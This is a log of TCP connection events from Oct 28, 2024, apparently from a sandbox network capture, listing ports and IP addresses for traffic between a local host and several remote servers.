                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.102504969 CET49941443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.102865934 CET49939443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.102896929 CET4434993923.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.103084087 CET49940443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.103099108 CET4434994023.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.103229046 CET49941443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.103250027 CET4434994123.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.119632959 CET4434993213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.120665073 CET49932443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.120682001 CET4434993213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.121262074 CET49932443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.121267080 CET4434993213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.160222054 CET4434993313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.166861057 CET49933443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.166899920 CET4434993313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.167331934 CET49933443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.167339087 CET4434993313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.249104977 CET4434993013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.249588013 CET49930443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.249641895 CET4434993013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.250240088 CET49930443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.250257015 CET4434993013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.254997015 CET4434993213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.256948948 CET4434993213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.257169008 CET49932443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.257194042 CET49932443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.257194042 CET49932443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.257215977 CET4434993213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.257229090 CET4434993213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.260257959 CET49942443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.260298014 CET4434994213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.260382891 CET49942443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.260503054 CET49942443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.260520935 CET4434994213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.293292999 CET4434993313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.293353081 CET4434993313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.293426037 CET49933443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.293550968 CET49933443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.293564081 CET4434993313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.293576956 CET49933443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.293581963 CET4434993313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.296080112 CET49943443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.296102047 CET4434994313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.296252012 CET49943443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.296350956 CET49943443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.296375036 CET4434994313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.380089998 CET4434993013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.380343914 CET4434993013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.380402088 CET49930443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.380430937 CET4434993013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.380467892 CET4434993013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.380531073 CET49930443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.380595922 CET49930443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.380595922 CET49930443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.380623102 CET4434993013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.380645037 CET4434993013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.383080006 CET49944443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.383116961 CET4434994413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.383265972 CET49944443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.383413076 CET49944443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.383430004 CET4434994413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.508879900 CET4434993623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.508994102 CET49936443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.528529882 CET49936443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.528546095 CET4434993623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.528805017 CET4434993623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.528904915 CET49936443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.529361963 CET49936443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.529391050 CET4434993623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.529436111 CET49936443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.529443026 CET4434993623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.699347019 CET4434994123.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.699750900 CET49941443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.699783087 CET4434994123.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.700797081 CET4434994123.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.700855017 CET49941443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.702013016 CET49941443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.702080011 CET4434994123.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.706780910 CET4434993923.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.709563971 CET49939443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.709608078 CET4434993923.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.709997892 CET4434993923.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.710591078 CET49939443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.710670948 CET4434993923.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.711906910 CET4434994023.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.712088108 CET49940443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.712095976 CET4434994023.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.713253021 CET4434994023.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.713651896 CET49940443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.713814974 CET4434994023.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.716665983 CET4434993713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.720331907 CET49937443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.720410109 CET4434993713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.720822096 CET49937443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.720837116 CET4434993713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.738864899 CET4434993623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.738910913 CET49936443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.739619017 CET4434993623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.739660025 CET4434993623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.739770889 CET49936443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.739770889 CET49936443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.756805897 CET49941443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.756810904 CET49939443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.756819010 CET49940443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.756825924 CET4434994123.221.22.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.798692942 CET49941443192.168.2.523.221.22.120
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.874610901 CET4434993713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.874679089 CET4434993713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.874777079 CET4434993713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.874845982 CET49937443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.875195026 CET49937443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.875233889 CET4434993713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.875283003 CET49937443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.875298977 CET4434993713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.877940893 CET49945443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.877989054 CET4434994513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.878048897 CET49945443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.878216028 CET49945443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.878231049 CET4434994513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.913043022 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.913116932 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.982933044 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.982949018 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.983319044 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.983434916 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:47.986558914 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.027373075 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.042438984 CET4434994313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.042926073 CET49943443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.042937040 CET4434994313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.043430090 CET49943443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.043433905 CET4434994313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.044838905 CET4434994213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.045224905 CET49942443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.045254946 CET4434994213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.045619965 CET49942443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.045628071 CET4434994213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.136214972 CET49947443192.168.2.520.75.60.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.136305094 CET4434994720.75.60.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.136462927 CET49947443192.168.2.520.75.60.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.136640072 CET49947443192.168.2.520.75.60.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.136673927 CET4434994720.75.60.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.139925003 CET4434994413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.140455008 CET49944443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.140475035 CET4434994413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.140995979 CET49944443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.141006947 CET4434994413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.175355911 CET4434994313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.175435066 CET4434994313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.175568104 CET49943443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.175854921 CET49943443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.175854921 CET49943443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.175870895 CET4434994313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.175879955 CET4434994313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.185739994 CET4434994213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.185811043 CET4434994213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.185868979 CET49942443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.187722921 CET49942443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.187722921 CET49942443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.187740088 CET4434994213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.187751055 CET4434994213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.189965963 CET49948443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.189992905 CET4434994813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.190184116 CET49948443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.194060087 CET49948443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.194072008 CET4434994813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.195568085 CET49949443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.195606947 CET4434994913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.195707083 CET49949443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.195847034 CET49949443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.195861101 CET4434994913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.275746107 CET4434994413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.275820017 CET4434994413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.275979996 CET49944443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.294349909 CET49944443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.294349909 CET49944443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.294384003 CET4434994413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.294410944 CET4434994413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.318308115 CET49950443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.318341017 CET4434995013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.318407059 CET49950443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.334358931 CET49950443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.334378004 CET4434995013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.379842043 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.379882097 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.379894972 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.379904032 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.379935026 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.379955053 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.379997969 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.380014896 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.380014896 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.380033016 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.449482918 CET49951443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.449526072 CET4434995123.47.194.66192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.449580908 CET49951443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.449815989 CET49952443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.449870110 CET4434995223.47.194.66192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.449942112 CET49952443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.449996948 CET49953443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.450076103 CET4434995323.47.194.66192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.450170040 CET49953443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.450198889 CET49954443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.450220108 CET4434995423.47.194.66192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.450356960 CET49954443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.450382948 CET49955443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.450407982 CET4434995523.47.194.66192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.450494051 CET49956443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.450530052 CET49955443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.450531960 CET4434995623.47.194.66192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.450581074 CET49956443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.451437950 CET49951443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.451455116 CET4434995123.47.194.66192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.451592922 CET49952443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.451623917 CET4434995223.47.194.66192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.451694012 CET49953443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.451726913 CET4434995323.47.194.66192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.451801062 CET49954443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.451824903 CET4434995423.47.194.66192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.451875925 CET49955443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.451894999 CET4434995523.47.194.66192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.452065945 CET49956443192.168.2.523.47.194.66
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.452084064 CET4434995623.47.194.66192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.519383907 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.519403934 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.519435883 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.519453049 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.519480944 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.519500017 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.519516945 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.519526958 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.519557953 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.519869089 CET49938443192.168.2.587.106.236.48
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.519881010 CET4434993887.106.236.48192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.644071102 CET4434994513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.644433975 CET49945443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.644465923 CET4434994513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.644911051 CET49945443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.644917965 CET4434994513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.675555944 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.682349920 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.776762962 CET4434994513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.776834011 CET4434994513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.776885986 CET49945443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.776905060 CET4434994513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.776949883 CET4434994513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.776998043 CET49945443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.777348042 CET49945443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.777364969 CET4434994513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.777376890 CET49945443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.777383089 CET4434994513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.780678988 CET49957443192.168.2.513.107.246.60
